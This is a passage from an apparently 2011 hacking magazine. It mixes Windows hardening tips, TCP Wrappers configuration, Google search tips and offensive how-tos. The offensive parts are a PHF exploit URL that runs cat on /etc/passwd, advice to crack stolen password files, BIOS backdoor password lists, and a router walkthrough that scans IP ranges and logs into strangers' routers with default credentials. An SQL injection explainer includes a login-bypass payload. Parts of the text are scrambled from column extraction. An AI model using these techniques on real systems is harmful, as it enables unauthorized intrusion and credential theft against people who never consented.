1 (this is a per-user setting). Some third-party programs such as Spybot Search And Destroy allow you to toggle this setting. You can also keep IE from having other programs rename its default startup page, another particularly annoying form of hijacking. Browse to HKEY.CURRENT USERSoftwarePolicies MicrosoftInternet ExploreControl Panel and add or edit a DWORD, Homepage and set it to 1. 9. Turn off unneeded Services: Windows 2000 and XP both come with many background services that don't need to he running most of the time: Alerter, Messenger, Server (If you're running a standalone machine with no file or printer shares), NetMeeting Remote Desktop Sharing, Remote Desktop Help Session Manager (the last two if you're not using Remote Desktop or NetMeeting), Remote Registry, Routing and Remote Access (if you're not using Remote Access), SSDP Discovery Service, Telnet, and Universal Plug and Play Device Host. A good resource and instruction on which of these services can be disabled go to /http://www.blkviper.com/WinXP/ 10. Disable simple File Shares: In Windows XP Professional, the Simple File Sharing mode is easily exploited, since it's a little too easy to share out a file across your LAN (or the NET at large). To turn it off, go m My Computer, click Tools, Folder Option and the View tab, and uncheck Use Simple file sharing (Recommended). Click OK. When you do this you can access the Security tab in the Properties window for all folders; set permissions for folders; and take ownership of objects (but not in XP Home).
Advertisement Here
www.amiable.in
18
Lulzsec hacker: 'we still have Sun emails, stored in China'
November 2011
Getting
Password File through FTP

Well one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need learn a little about the password file.
root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones: /bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
although the files vary from system to system. 1. The first step that you would take is to download or copy the file. 2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there are a few ok ones out there. I recommend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking program you will be asked to find the the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose (ASCII, caps, lowercase, and numeric letters may also be added) . 3. You then start up the cracker and follow the directions that it gives you. The PHF Technique: Well I wasn't sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But still i thought that you should know about it. So I decided to include it. The phf technique is by far the easiest way of getting a password file (although it doesn't work 95% of the time). But to do the phf all you do is open a browser and type in the following link:
h t t p : / / w e b p a g e _ g o e s _ h e r e /c g i - b i n / p h f ? Q a l i a s = x % 0 a / bin/cat%20/etc/passwd
This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That's the main part of the file. root:x:0:1:Superuser:/: ftp:x:202:102:Anonymous ftp:/u1/ftp: ftpadmin:x:203:102:ftp Administrator:/u1/ftp This is another example of a password file, only this one has one little difference, it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker (both explained later in the text). Below is another example of a shadowed password file:
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp: smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr /lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no body:/: noaccess:x:60002:60002:uid no access:/: webmastr:x:53:53:WWW Admin:/export/home/webmastr:/ usr/bin/csh pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/ new/gregY/test/pin4geo:/bin/false ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
You replace the webpage_goes_here with the domain. So if you were trying to get the pw file for www.webpage.com you would type:
h t t p : / / w w w.w e b p a g e . c o m / c g i - b i n / p h f ? Q a l i a s = x % 0 a / bin/cat%20/etc/passwd
and that's it! You just sit back and copy the file (if it works).
Shadowed password files have an "x" in the place of a password or sometimes they are disguised as an * as well. Now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted password from a shadowed password file. We can now go on to talk about how to crack it. Cracking a password file isn't as complicated as it would seem,
www.amiable.in
Advertisement Here
19
Hacking group accuses German police of using info-stealing Trojan.
November 2011
Bypass
BIOS Passwords
DISCLAIMER : This article is intended for IT Professionals and systems administrators with experience servicing computer hardware. It is not intended for home users, hackers, or computer thieves attempting to crack the password on a stolen PC. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. LabMice.net is not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.
BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. Unfortunately, BIOS passwords can also be a liability if a user forgets their password, or changes the password to intentionally lock out the corporate IT department. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered in the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS.
the event the manufacturer cannot (or will not) help you, there are a number of methods that can be used to bypass or reset the BIOS password yourself. They include: Using a manufacturers backdoor password to access the BIOS Use password cracking software Reset the CMOS using the jumpers or solder beads. Removing the CMOS battery for at least 10 minutes
Before attempting to bypass the BIOS password on a Overloading the keyboard buffer computer, please take a minute to contact the hardware manufacturer support staff directly and ask for their recommended methods of bypassing the BIOS security. In
www.amiable.in
20
Android malware - Works on remote commands form encrypted blog
November 2011
Using a Professional Service

Please remember that most BIOS passwords do not protect the hard drive, so if you need to recover the data, simply remove the hard drive and install it in an identical system, or configure it as a slave drive in an existing system. The exceptions to this are laptops, especially IBM Thinkpads, which silently lock the hard drive if the supervisor password is enabled. If the supervisor password is reset without resetting the and hard drive as well, you will be unable to access the data on the drive.
Iwill iwill Jetway spooml Packard Bell bell9 QDI QDI Siemens SKY_FOX TMC BIGO Toshiba Toshiba
TOSHIBA BIOS Most Toshiba laptops and some desktop systems will bypass the BIOS password if the left shift key is held down during boot IBM APTIVA BIOS
Backdoor passwords
Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations. Keep in mind that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name brand laptops. WARNING: Some BIOS configurations will lock you out of the system completely if you type in an incorrect password more than 3 times. Read your manufacturers documentation for the BIOS setting before you begin typing in passwords Award BIOS backdoor passwords:
ALFAROME ALLy aLLy aLLY ALLY aPAf _award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC 01322222 589589 589721 595595 598598
Press both mouse buttons repeatedly during the boot
Password cracking software

The following software can be used to either crack or reset the BIOS on many chipsets. If your PC is locked with a BIOS administrator password that will not allow access to the floppy drive, these utilities may not work. Also, since these utilities do not come from the manufacturer, use them cautiously and at your own risk. Cmos password recovery tools 3.1 !BIOS (get the how-to article) RemPass KILLCMOS
Using the Motherboard "Clear CMOS" Jumper or Dipswitch settings

Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings including BIOS passwords. The locations of these jumpers / dipswitches will vary depending on the motherboard manufacturer and ideally you should always refer to the motherboard or computer manufacturer's documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper / dipswitch CLEAR - CLEAR CMOS - CLR - CLRPWD PASSWD - PASSWORD - PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop. Please remember to unplug your PC and use a grounding strip before reaching into your PC and touching the motherboard. Once you locate and rest the jumper switches, turn the computer on and check if the password has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to its original position.
AMI BIOS backdoor passwords:

AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO
PHOENIX BIOS backdoor passwords:

phoenix, PHOENIX, CMOS, BIOS MISC. COMMON PASSWORDS ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj
Other BIOS Passwords by Manufacturer :

Manufacturer Password VOBIS & IBM merlin Dell Dell Biostar Biostar Compaq Compaq Enox xo11nE Epox central Freetech Posterie
www.amiable.in
21
Apache Patch released for Reverse proxy Bypass Vulnerability
November 2011
Removing the CMOS Battery

The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard. (It looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the password should be blank. (Along with any other machine specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this.) Some manufacturers backup the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leaves the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don't attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time. Note: Removing the battery to reset the CMOS will not work for all PC's, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM Thinkpad laptops lock the hard drive as well as the BIOS when the supervisor password is set. If you reset the BIOS password, but cannot reset the hard drive password, you may not be able to access the drive and it will remain locked, even if you place it in a new laptop. IBM Thinkpads have special jumper switches on the motherboard, and these should be used to reset the system.
Overloading the KeyBoard Buffer

On some older computer systems, you can force the CMOS to enter its setup screen on boot by overloading the keyboard buffer. This can be done by booting with the keyboard or mouse unattached to the systems, or on some systems by hitting the ESC key over 100 times in rapid succession.
Jumping the Solder Beads on the CMOS

It is also possible to reset the CMOS by connecting or "jumping" specific solder beads on the chipset. There are too many chipsets to do a breakdown of which points to jump on individual chipsets, and the location of these solder beads can vary by manufacturer, so please check your computer and motherboard documentation for details. This technique is not recommended for the inexperienced and should be only be used as a "last ditch" effort.
Using a professional service

If the manufacturer of the laptop or desktop PC can't or won't reset the BIOS password, you still have the option of using a professional service. Many corporations offer a variety of services for desktop and laptop computers for between $100 and $400. For most of these services, you'll need to provide some type of legitimate proof of ownership. This may be difficult if you've acquired the computer second hand or from an online auction.
Advertisement Here
www.amiable.in
22
Microsoft FUSE Labs Sub-domain defaced by Hmei7
November 2011
TCP Wrappers
If you are running a Linux box and connect to the net through it, then there is every chance of someone else using or misusing the services running on your system. If someone gets to know your IP, then it does give the attacker an opportunity to be able to use the services or daemons running on varous ports of your system for malicious purposes. Thus it has become very important to ensure that you define a access list which controls who all can have access to what services on your system and who all should be blocked or denied access to any of the services on your system. This is where TCP Wrappers are so efficient but easy to use. So What Exactly are TCP Wrappers? Well, TCP Wrappers basically act as efficient tools which allow us to define a set of rules called the access control rules. These access control rules control or define which hosts or machines are allowed to access and use the services running on the local machine(where the TCP Wrappers areinstalled and configured) and which hosts or machines are denied access to these services. So they infact are somewhat (well, quite remotely) something like Firewalls. They check to see who has requested the connection and if the connection requestor in amongst the deny list, then he is not allowed to open a connection. Besides controlling the access to various services on your system, TCP wrappers also allow you to log and know who is using what service at what time and even for what purpose. The best thing about TCP Wrappers is that they can also be used to set boobey traps to catch lamers. Now, the above can be arranged as below: Anyway, before we go on, we need to have basic understanding of how exactly, Linux responds to a connection request. Now, the thing to remember here is that all requests for connections received by a Linux box, are transferred to the Internet Daemon or the 'inetd'. The 'inetd' is the main daemon on a Linux Machine, which receives all connection requests on behalf of all services or daemons running on all the Port Numbers. Now, once the 'inetd' receives a connection request, it uses 2 configurationfiles two determine what to do next. These two files are: 1. /etc/services 2. /etc/inetd.conf The first one, the /etc/services file contains the names of the various Services and the corresponding port numbers on which they run. It is basically used by the 'inetd' to figure out what service runs on a particular Port Number. The Second File, the /etc/inetd.conf contains the names of various services and the names of the corresponding daemons or programs providing those services. It is used by 'inetd' to figure out which program or daemon to call on when there is a request for a connection to a particular service. Both these files work together and are interlinked. To understand with a real life example, as to how exactly the 'inetd' uses these two files to allow remote connections to take place, read the below paragraph. Let us assume that the server is Y and the client(connection requestor) is X. Now, X send Y a packet containing the Port Number to which it wants to connect (In this case 23 or the Telnet Port) and other such information required for a TCP connection to start. At Y, the 'inetd' daemon responds to the connection request and looks up the /etc/services file for the service name running on Port 23 (This Port number is mentioned in the packet sent by X). The /etc/services/ responds to 'inetd' saying that the service name running on Port 23 is Telnet. Then, 'inetd' contacts '/etc/inetd.conf' and asks for the name of the daemon or program which runs the telnet service. The '/etc/inetd.conf' file replies saying that a daemon called in.telnetd. Then 'inetd' runs in.telnetd and that is when its job is over and it starts listening for other connection requests. So, basically a remote system doesn't start out by directly communicating with the various daemons, but instead communicates only with the 'inetd' in the beginning. Now, if we want to restrict some particular hosts from accessing our system and allow only a predefined set of hosts to access our system, they what do we do? This is when, TCP Wrappers come to the rescue. A TCP Wrapper acts as a daemon which resides between the main daemon of the linus system i.e. the 'inetd' and other programs or daemons like in.ftpd, in.telnetd etc. As all connections to the linux box will pass through the inetd, they will also definitely pass through the TCP Wrapper. Right? Thus, if there are certain rules which are defined by TCP Wrappers, then they indeed can be used to manipulate access control.
www.amiable.in
23
Student Arrested for hacking Thailand Prime Minister Accounts
November 2011
NOTE: Normally, the inetd is configured to call the concerned programs or daemons like telnetd etc. However, once TCP wrappers are installed, then the inetd is configured to call on the Wrapper instead of the concerned daemon. Providing System: which means that mosts services are open and most people are allowed access to it. This would be the best option for you, if your system is used as server providing services like mail, FTP, Telnet etc to a number of legitimate users. This way not only can you provide services to legitimate users, but also ensure that unwanted hosts or clients do not get access to the services offered by your server. KNOWN: Matches hosts which are resolved by DNS. PARANOID: Matches hosts whose names does not match with it's IP. HACKING TRUTH: To allow access to all services to systems within your local domain, enter the following line in your /etc/hosts.allow: ALL : LOCAL The Secure But No Service Providing System The thing to remember here is that the hosts.allow file is checked first and then the hosts.deny and access is allowed only if no match is found in the hosts.deny file Anyway, in order to restrict all services or disallow all services to all hosts, then enter the following line in the hosts.deny file: ALL : ALL The hosts.allow file should contain the service name and the hosts to which access should be allowed. Now, we would certainly like to be able to access all services running on our own machine from our own machine. So, in the hosts.allow file, enter the below line: ALL:localhost Now, say you want to be able to access the FTP daemon from abc.com, then enter the following line: in.ftpd : abc.com But, say you want to disallow hosts coming from the isp.net domain, and allow all other hosts to access the telnet daemon, then enter the following line: in.telnetd : ALL EXCEPT isp.net
Anyway, once the inetd daemon calls on the TCP Wrapper or sends the packet recevied to the wrapper, the wrapper collects the source IP from the packet and accordingly allows or denies a connection. Irrespective of whether the connection is allowed or denied, the 2. The Secure But No Service Providing wrapper enters a log into the system log System: This is typically meant for those file. of you who are very security conscious and for those whose system is not NOTE: Now, I am assuming that you have providing services to legitimate users. been able to install the TCP Wrapper This ensures that no one misuses your daemon i.e. /usr/sbin/tcpd For more system. information on how to install the TCP Wrapper read the Linux Documentation, The Not So Secure But Service Providing H e l p o r m a n p a g e s . O r v i s i t : System www.linuxdoc.com or www.linux.com or www.newbielinux.com In this case, as we allow access to most services, the /etc/hosts.allow list is Anyway, now, how does the TCP p r a c t i c a l l y e m p t y. W h i l e , t h e Wrapper daemon i.e. /usr/sbin/tcpd /etc/hosts.deny file contains rules which decide whether to allow access to a govern as to which hosts to disallow particular host or not? Well, the Wrapper access. Let us take an example of a is helped in this aspect by two files: typical rule of the /etc/hosts.deny file to understand how exactly rules work. 1. The /etc/hosts.allow 2. The /etc/hosts.deny The following is a hosts.deny entry which denies access to the Telnet and FTP As soon as the inetd sends the services to anyone coming from connection request to the Wrapper, tcpd abc.isp.com and anyone coming from scans the /etc/hosts.allow for a match the domain isp.net: for the hostname of the connection requestor. If a match is found, then the in.telnetd in.ftpd : abc.isp.com .isp.net connection is opened. However, if no matches are found, then it searchs the Note: The '.' preceeding the isp.net tells /etc/hosts.deny file for a match. Well, if tcpd to disallow access to the FTP and even then no match is found or even if Telnet daemons to anyone coming from both the files are empty, then the a system in the isp.net domain. connection is allowed to be opened. If you want to deny access to all services, NOTE: By Default both of them are the above will change to: empty, allowing everyone to open connections. ALL: abc.isp.com .isp.net Now, that we know how tcpd works, let us move on to how exactly to configure it. The important thing to remember while configuring a tcpd, is what level of security do you really want your system to have. Whatever kind of setup you may have, you basically are left out with two options-: Above, the ALL wildcard was used to restrict access to all services. Like ALL, there are a number of similiar Wildcards, which can be used for access control. Some common ones are:
LOCAL: This matches for hostnames coming from the local domain. UNKNOWN: Matches hosts which are 1. The Not So Secure but Service unresolved by DNS.
www.amiable.in
24
Malware on Mac Computer Appears as a PDF File
November 2011
How to
Hack an Ethernet ADSL Router
Almost half of th the globe use e Internet users across ADSL routers Step-3: Go to Tools->Pre /modems to connect to the Internet ferences an Ports tab. U d select the however, m of them are nder Port se ost unaware of lection ente to scan for p a serious the fact that r 80 (we nee ort 80). Now vulnerability it has d switch to the select the o which can exploited eve Display tab, ption Host easily be n by a noob s with open and click on hacker just lik this post I will ports only OK. e you. In show you ho w to exploit vulnerability a common that lies in m I have used ost ADSL rou to gain com Angry IP Sca ters so as plete access nner v3.0 b are using a to the route and ISP login eta-4. If you different ve r settings details. rsion, you n Options inst eed to Go to ead of Tools Every route r comes w Step-4: Now ith a usern password usi click on Sta ame and ng which it is rt. After a fe the IP scann possible to ga to the route w minutes, er will show in access r settings an a list of IPs w open as show d configure The vulnera ith Port 80 the device. n in the belo bility actua w image. lly lies in th username a e Default nd password Step-5: Now tha factory sett copy any of ings. Usually t comes with the the IP from th it in your bro the routers p re co nfi g u e list, paste wser's addre re d fro m come ss bar and h window will th e Inte rn provider an it enter. A et S e rv ic e popup askin d hence the g for usern password. Si users do no change the ame and nce most u t bother to password la sers do not passwords, ter. This m possible for change the it should m akes it the attackers ost likely w default usern to gain unau access and ork with th ame and pass thorized modify the e word. For m the default router settin co m m o n se ost routers username-p gs using a t o f d efa u assword pa admin-admin lt u se rn a m passwords. H ir will be or admin-pa es and ere is how yo ssword. u can do it. Just enter th Before you e username proceed, yo -password a above and h u need the tool in the pro s specified it enter. If yo following cess u are lucky gain access to you should the router se ttings page w can modify a Angry IP Sca here you ny of the rou nner ter settings. page can va The settings ry from rou ter to route router settin Here is a d r. A sample gs page is sh etailed info own below. rmation on exploit the vu how to lnerability o If you do f an ADSL rou not succee ter. d to gain a another IP Step-1: Go ccess, select from the lis to www.wh t and repea Atleast 1 ou atismyipadd Once the pa t the step-5 t of 5 IPs will ress.com. ge is loaded . have a defau and hence yo you will find address. No lt password u will surely your IP te it down. be able to ga in access. Step-2: Ope n Angry IP Sc anner, here see an optio you n called IP Ra nge: where yo will to enter the u need range of IP a ddress to sca n for. Suppose you r IP is 117.1 92.195.101, set the range you can something a s 117.192.1 117.192.200 94.0 to .255 so tha t there are 200-300 IP a at least ddresses in th e range.
www.amiable.in
25
Facebook Improves Security through Websense Service
November 2011
SQL Injection
SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organisations. It is perhaps one of the most common application layer attack techniques used today. Web applications allow legitimate website visitors to submit and retrieve data to/from a database over the Internet using their preferred web browser. Databases are central to modern websites they store data needed for websites to deliver specific content to visitors and render information to customers, suppliers, employees and a host of stakeholders. User credentials, financial and payment information, company statistics may all be resident within a database and accessed by legitimate users through off-theshelf and custom web applications. Web applications and databases allow you to regularly run your business. SQL Injection is the hacking technique which attempts to pass SQL commands through a web application for execution by the backend database. If not santised properly, web applications may result in SQL Injection attacks that allow hackers to view information from the database and/or even wipe it out. Such features as login pages, support and product request forms, feedback forms, search pages, shopping carts and the general delivery of dynamic content, shape modern websites and provide businesses with the means necessary to communicate with prospects and customers. These website features are all examples of web applications which may be either purchased off-the-shelf or developed as bespoke programs. These website features are all susceptible to SQL Injection attacks. words, the web application that controls the login page will communicate with the database through a series of planned commands so as to verify the username and password combination. On verification, the legitimate user is granted appropriate access. Through SQL Injection, the hacker may input specifically crafted SQL commands with the intent of bypassing the login form barrier and seeing what lies behind it. This is only possible if the inputs are not properly sanitised (i.e., made invulnerable) and sent directly with the SQL query to the database. SQL Injection vulnerabilities provide the means for a hacker to communicate directly to the database. The technologies vulnerable to this attack are dynamic script languages including ASP, ASP.NET, PHP, JSP, and CGI. All an attacker needs to perform an SQL Injection hacking attack is a web browser, knowledge of SQL queries and creative guess work to important table and field names. The sheer simplicity of SQL Injection has fuelled its popularity. Why is it possible to pass SQL queries directly to a database that is hidden behind a firewall and any other security mechanism? Firewalls and similar intrusion detection mechanisms provide little or no defense against full-scale SQL Injection web attacks. Since your website needs to be public, security mechanisms will allow public web traffic to communicate with your web application/s (generally over port 80/443). The web application has open access to the database in order to return (update) the requested (changed) information. In SQL Injection, the hacker uses SQL queries and creativity to get to the database of sensitive corporate data through the web application. SQL or Structured Query Language is the computer language that allows you to store, manipulate, and retrieve data stored in a relational database (or a collection of tables which organise and structure data). SQL is, in fact, the only way that a web application (and users) can interact with the database. Examples of relational databases include Oracle, Microsoft Access, MS SQL Server, MySQL, and Filemaker Pro, all of which use SQL as their basic building blocks. SQL commands include SELECT, INSERT, DELETE and DROP TABLE. DROP TABLE is as ominous as it sounds and in fact will eliminate the table with a particular name. In the legitimate scenario of the login page example above, the SQL commands planned for the web application may look
SQL Injection: A Simple Example

Take a simple login page where a legitimate user would enter his username and password combination to enter a secure area to view his personal details or upload his comments in a forum. When the legitimate user submits his details, an SQL query is generated from these details and submitted to the database for verification. If valid, the user is allowed access. In other
www.amiable.in
26
Cyber Cell Mumbai Websites hacked by Pakistani Hacker
November 2011
like the following: SELECT count(*) FROM users_list_table WHERE username='FIELD_USERNAME AND password='FIELD_PASSWORD In plain English, this SQL command (from the web application) instructs the database to match the username and password input by the legitimate user to the combination it has already stored. Each type of web application is hard coded with specific SQL queries that it will execute when performing its legitimate functions and communicating with the database. If any input field of the web application is not properly sanitised, a hacker may inject additional SQL commands that broaden the range of SQL commands the web application will execute, thus going beyond the original intended design and function. A hacker will thus have a clear channel of communication (or, in layman terms, a tunnel) to the database irrespective of all the intrusion detection systems and network security equipment installed before the physical database server. either to compromise it or else to obtain information. If improperly coded, then you run the risk of having your customer and company data compromised. What an attacker gains access to also depends on the level of security set by the database. The database could be set to restrict to certain commands only. A read access normally is enabled for use by web application back ends. Even if an attacker is not able to modify the system, he would still be able to read valuable information.
What is the impact of SQL Injection?

Once an attacker realizes that a system is vulnerable to SQL Injection, he is able to inject SQL Query / Commands through an input form field. This is equivalent to handing the attacker your database and allowing him to execute any SQL command including DROP TABLE to the database! An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system access for the attacker. It may be possible to manipulate existing queries, to UNION (used to select related information from two tables) arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shell commands on the underlying operating system.[break][break]Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database server functions). If an attacker can obtain access to these procedures it. Unfortunately the impact of SQL Injection is only uncoveredwhen the theft is discovered. Data is being unwittingly stolen through various hack attacks all the time. The more expert of hackers rarely get caught.
Is my database at risk to SQL Injection?

SQL Injection is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against SQL Injection, there are a large number of web applications that remain vulnerable. According to the Web Application Security Consortium (WASC) 9% of the total hacking incidents reported in the media until 27th July 2006 were due to SQL Injection. More recent data from our own research shows that about 50% of the websites we have scanned this year are susceptible to SQL Injection vulnerabilities. It may be difficult to answer the question whether your web site and web applications are vulnerable to SQL Injection especially if you are not a programmer or you are not the person who has coded your web applications. Our experience there is a your data is Injection. W h et h leads us to believe that significant chance that already at risk from SQL
Example of a SQL Injection Attack

Here is a sample basic HTML form with two inputs, login and password. <form method="post" action="http://localhost/login.asp"> <input name="tfUName" type="text" id="tfUName"> <input name="tfUPass" type="password" id="tfUPass"> </form> The easiest way for the login.asp to work is by building a database query that looks like this: SELECT id FROM logins WHERE username = '$username AND password = '$password If the variables $username and $password are requested directly from the user's input, this can easily be compromised.
er an attacker is able to see the data stored on the database or not, really depends on how your website is coded to display the results of the queries sent. What is certain is that the attacker will be able to execute arbitrary SQL Commands on the vulnerable system,
www.amiable.in
27
November 2011
Suppose that we gave "Joe" as a username and that the following string was provided as a password: anything' OR 'x'='x SELECT id FROM logins WHERE username = 'Cipher AND password = 'anything' OR 'x'='x As the inputs of the web application are not properly sanitised, the use of the single quotes has turned the WHERE SQL command into a two-component clause. The 'x'='x' part guarantees to be true regardless of what the first part contains. This will allow the attacker to bypass the login form without actually knowing a valid username / password combination!
How do I prevent SQL Injection attacks?

Firewalls and similar intrusion detection mechanisms provide little defense against full-scale web attacks. Since your website needs to be public, security mechanisms will allow public web traffic to communicate with your databases servers through web applications. Isn't this what they have been designed to do? Patching your servers, databases, programming languages and operating systems is critical but will in no way the best way to prevent SQL Injection Attacks.
Advertisement Here
www.amiable.in
28
November 2011
How to Hide the Partitions?

This trick is for all those people who want to hide tons of data into their box. So here it is if you have very important data in your hard drive placed in some partition which you do not want anybody to see then this trick is only for you!!! 1. Just click on Start>Run and type gpedit.msc 2.Now navigate through User Configuration> Administrative Templates > Windows Components> Windows Explorer 3. Double click on Hide these specified drives in My Computer modify it accordingly. 4. Then just below you will find another option Prevent access to drives from My Computer, double click on this option and modify it accordingly. 5. To make it visible again select "disable" by double clicking on the Hide these specified drives in My Computer option. WARNING: Don't try to experiment with other options in gpedit.msc if you don't know, what exactly your doing.
Ultimate Google Search Tips

1. The best way to begin searching harder with Google is by clicking the Advanced Search link. 2. This lets you search for exact phrases, "all these words", or one of the specified keywords by entering search terms into the appropriate box. 3. You can also define how many results you want on the page, what language and what file type you're looking for, all with menus. 4. Advanced Search lets you type in a Top Level Domain (like .co.uk) in the "Search within site of domain" box to restrict results. 5. And you can click the "Date, usage rights, numeric range and more" link to access more advanced features. 6. Save time most of these advanced features are also available in Google's front page search box, as command line parameters. 7. Google's main search invisibly combines search terms with the Boolean construct "AND". When you enter smoke fire it
www.amiable.in
29
November 2011
looks for smoke AND fire. 8. To make Google search for smoke or fire, just type smoke OR fire 9. Instead of OR you can type the | symbol, like this: smoke | fire 10. Boolean connectors like AND and OR are case sensitive. They must be upper case. 11. Search for a specific term, then one keyword OR another by grouping them with parentheses, like this: water (smoke OR fire) 12. To look for phrases, put them in quotes: "there's no smoke without fire" 13. Synonym search looks for words that mean similar things. Use the tilde symbol before your keyword, like this: ~eggplant 14. Exclude specific key words with the minus operator. new pram -ebay excludes all results from eBay. 15. Common words, like I, and, then and if are ignored by Google. These are called "stop words". 16. The plus operator makes sure stop words are included. Like: fish +and chips 17. If a stop word is included in a phrase between quote marks as a phrase, the word is searched for. 18. You can also ask Google to fill in a blank. Try: Christopher Columbus discovered * 19. Search for a numerical range using the num range operator. For example, search for Sony TV between 300 and 500 with the string Sony TV 300..500 20. Google recognizes 13 main file types through advanced search, including all Microsoft Office Document types, Lotus, PostScript, Shockwave Flash and plain text files. 21. Search for any filetype directly using the modifier filetype:[filetype extension]. For example: soccer filetype:pdf 22. Exclude entire file types, using the same Boolean syntax we used to exclude key words earlier: rugby -filetype:doc 23. In fact, you can combine any Boolean search operators, as long as your syntax is correct. An example: "sausage and mash" onions filetype:doc 24. Google has some very powerful, hidden search parameters, too. For example "intitle" only searches page titles. Try intitle:herbs 25. If you're looking for files rather than pages give index of as the intitle: parameter. It helps you find web and FTP directories. 26. The modifier inurl only searches the web address of a page: give inurl:spices a go. 27. Find live webcams by searching for: inurl:view/view.shtml 28. The modifier inanchor is very specific, only finding results in text used in page links.
www.amiable.in
30
November 2011
29. Want to know how many links there are to a site? Try link:sitename for example link:www.mozilla.org 30. Similarly, you can find pages that Google thinks are related in content, using the related: modifier. Use it like this: related:www.microsoft.com 31. The modifier info:site_name returns information about the specified page. 32. Alternatively, do a normal search then click the "Similar Pages" link next to a result. 33. Specify a site to search with the site: modifier like this: search tips site:www.microsoft.com 34. The above tip works with directory sites like www.dmoz.org and dynamically generated sites. 35. Access Google Directory a database of handpicked and rated sites at directory.google.com 36. The Boolean operators intitle and inurl work in Google directory, as does OR. 37. Use the site: modifier when searching Google Images, at images.google.com. For example: dvd recorder site:www.amazon.co.uk 38. Similar, using "site:.com" will only return results from .com domains. 39. Google News (news.google.com) has its own Boolean parameters. For example "intext" pulls terms from the body of a story. 40. If you use the operator "source:" in Google News, you can pick specific archives. For example: heather mills source:daily_mail 41. Using the "location:" filter enables you to return news from a chosen country. location:uk for example. 42. Similarly, Google Blogsearch (blogsearch.google.com) has its own syntax. You can search for a blog title, for example, using inblogtitle:<keyword> 43. The general search engine can get very specific indeed. Try movie:<name of film> to look for movie reviews. 44. The modifier film: works just as well! 45. Enter showtimes and Google will prompt you for your postcode. Enter it and it'll tell you when and where local films are showing. 46. For a dedicated film search page, go to www.google.co.uk/movies 47. If you ticked "Remember this Location" when you searched for show times, the next time you can enter the name of a current film instead. 48. Google really likes movies. Try typing director: The Dark Knight into the main search box. 49. For cast lists, try cast: name_of_film.
www.amiable.in
31
November 2011
